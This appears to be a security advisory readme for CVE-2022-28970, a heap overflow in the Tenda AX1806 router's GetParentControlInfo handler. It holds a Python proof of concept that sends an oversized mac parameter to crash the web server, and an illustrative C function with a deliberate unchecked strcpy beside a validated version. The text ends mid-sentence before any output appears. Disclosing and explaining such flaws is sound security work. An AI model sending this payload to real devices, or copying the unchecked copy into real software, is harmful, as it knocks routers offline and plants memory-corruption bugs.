CVE-2022-28970: IoT-vuln/readme.md at main · d1tto/IoT-vuln

Tenda AX1806 v1.0.0.1 was discovered to contain a heap overflow via the mac parameter in the function GetParentControlInfo. This vulnerability allows attackers to cause a Denial of Service (DoS).

Tenda AX1806 GetParentControlInfo function heap overflow

Overview

  • The device’s official website: https://www.tenda.com.cn/product/AX1806.html
  • Firmware download website: https://www.tenda.com.cn/download/detail-3306.html

Affected version

v1.0.0.1

Vulnerability details

/bin/tdhttpd has a heap overflow vulnerability. The vulnerability is in the GetParentControlInfo function, which is reachable through the URL goform/GetParentControlInfo.

The function takes the POST parameter mac, does not verify its length, and copies it directly to the heap memory, resulting in a heap overflow.
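The unchecked copy described above, next to a validated one, as an added C example that is not the firmware's code or the advisory author's. The struct layout, the 18-byte field size and all function names are assumptions, since the page does not show the decompiled function.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#define MAC_STR_LEN 17 /* length of "aa:bb:cc:dd:ee:ff" */

/* Assumed heap record; the real structure in tdhttpd is not shown on the page. */
struct parent_ctl_entry {
    char mac[MAC_STR_LEN + 1];
};

/* Unsafe shape matching the advisory's description (illustrative only):
 * the length of the request parameter decides how many bytes are written. */
struct parent_ctl_entry *entry_new_unchecked(const char *mac)
{
    struct parent_ctl_entry *e = calloc(1, sizeof(*e));
    if (e != NULL)
        strcpy(e->mac, mac); /* writes past the field when mac exceeds 17 chars */
    return e;
}

/* Returns 1 only for exactly six colon-separated hex octets, else 0. */
int mac_is_valid(const char *s)
{
    if (s == NULL || strlen(s) != MAC_STR_LEN)
        return 0;
    for (size_t i = 0; i < MAC_STR_LEN; i++) {
        if (i % 3 == 2) {
            if (s[i] != ':')
                return 0;
        } else if (!isxdigit((unsigned char)s[i])) {
            return 0;
        }
    }
    return 1;
}

/* Hardened shape: validate length and format first, then copy a fixed size.
 * Returns NULL on invalid input or allocation failure; caller frees. */
struct parent_ctl_entry *entry_new_checked(const char *mac)
{
    if (!mac_is_valid(mac))
        return NULL;
    struct parent_ctl_entry *e = calloc(1, sizeof(*e));
    if (e != NULL)
        memcpy(e->mac, mac, MAC_STR_LEN); /* calloc already zeroed the terminator */
    return e;
}
```

Rejecting the request before any allocation also keeps oversized input from reaching later code that assumes a well-formed MAC string.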

PoC

PoC of Denial of Service (DoS)

import requests

data = {
    b"mac": b"A"*0x400
}
res = requests.post("http://127.0.0.1/goform/GetParentControlInfo", data=data)
print(res.content)

I use qemu-user to emulate it. When I run the POC script, I can see
